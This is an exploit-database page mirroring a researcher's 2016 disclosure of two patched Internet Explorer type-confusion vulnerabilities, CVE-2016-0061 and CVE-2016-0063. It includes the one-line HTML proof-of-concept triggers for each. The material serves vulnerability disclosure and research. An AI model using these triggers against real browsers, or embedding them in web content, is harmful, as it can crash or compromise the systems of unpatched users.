Advertisement






Microsoft Internet Explorer Type Confusion

CVE Category Price Severity
CVE-2016-0061 CWE-119 $10,000 High
Author Risk Exploitation Type Date
Google Project Zero Critical Remote 2016-02-16
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H 0.739791 0.947565

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016020145

Below is a copy:

Microsoft Internet Explorer Type ConfusionHello everyone,

I've recently released examples on twitter of how to trigger two
security vulnerabilities in Microsoft Internet Explorer. These issue
were discovered last year and reported to Microsoft through ZDI.
Microsoft release security updates to address these issues last Tuesday.

======

CVE-2016-0061:
https://twitter.com/berendjanwever/status/697819335574843394

MSHTML Form element id type confusion CVE-2016-0061 ZDI-16-162 MS16-009

<meta http-equiv=X-UA-Compatible content=IE=7><form id="䅁䅁"><body onload=opener?opener["u4141u4141"]():open("?")>

======

CVE-2016-0063:
https://twitter.com/berendjanwever/status/697818121835581441

DOMImplementation method type confusion CVE-2016-0063 ZDI-16-166 MS16-009 

<body onload=open("2.html")> (part 1/2)
<meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()> (part 2/2)

======

Both were found through fuzzing inspired by Michal Zalewski's cross_fuzz
http://lcamtuf.blogspot.nl/2011/01/announcing-crossfuzz-potential-0-day-in.html

Cheers,

SkyLined


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum